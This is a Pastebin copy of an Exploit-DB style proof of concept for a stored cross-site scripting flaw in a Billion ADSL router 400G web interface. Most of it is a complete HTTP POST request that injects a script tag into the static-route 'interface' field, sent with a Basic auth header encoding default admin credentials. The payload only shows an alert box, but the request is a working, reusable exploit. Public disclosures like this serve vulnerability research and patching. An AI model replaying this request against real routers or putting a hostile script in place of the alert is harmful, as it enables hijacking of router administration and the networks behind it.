API tools faq
paste
Advertisement
TVT618

EDB-ID-45515

TVT618
Oct 5th, 2018
530
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.13 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title: Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
  2. # Author: Cakes
  3. # Discovery Date: 2018-09-30
  4. # Vendor Homepage: http://www.billion.com
  5. # Software Link: http://billionfirmware.co.za
  6. # Tested Version: 20151105641
  7. # Tested on OS: Kali Linux
  8. # CVE: N/A
  9.  
  10. # Description:
  11. # Improper input validation on the router web interface allows attackers add a persistent
  12. # Cross-Site scripting attack on the IP Interface field when adding a new static route.
  13. # Simply intercept a new static route request and add in the XSS
  14.  
  15. # Poc
  16.  
  17. POST /configuration/edit-list.html HTTP/1.1
  18. Host: Target
  19. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
  20. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  21. Accept-Language: en-US,en;q=0.5
  22. Accept-Encoding: gzip, deflate
  23. DNT: 1
  24. Referer: http://Target/configuration/edit-list.html
  25. Authorization: Basic YWRtaW46YWRtaW4=
  26. Connection: close
  27. Content-Type: application/x-www-form-urlencoded
  28. Content-Length: 93
  29.  
  30. nodename=&destination=0.0.0.0&netmask=0.0.0.0&gateway=0.0.0.1&interface=<script>alert("Cakes");</script>&cost=1&action=create
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!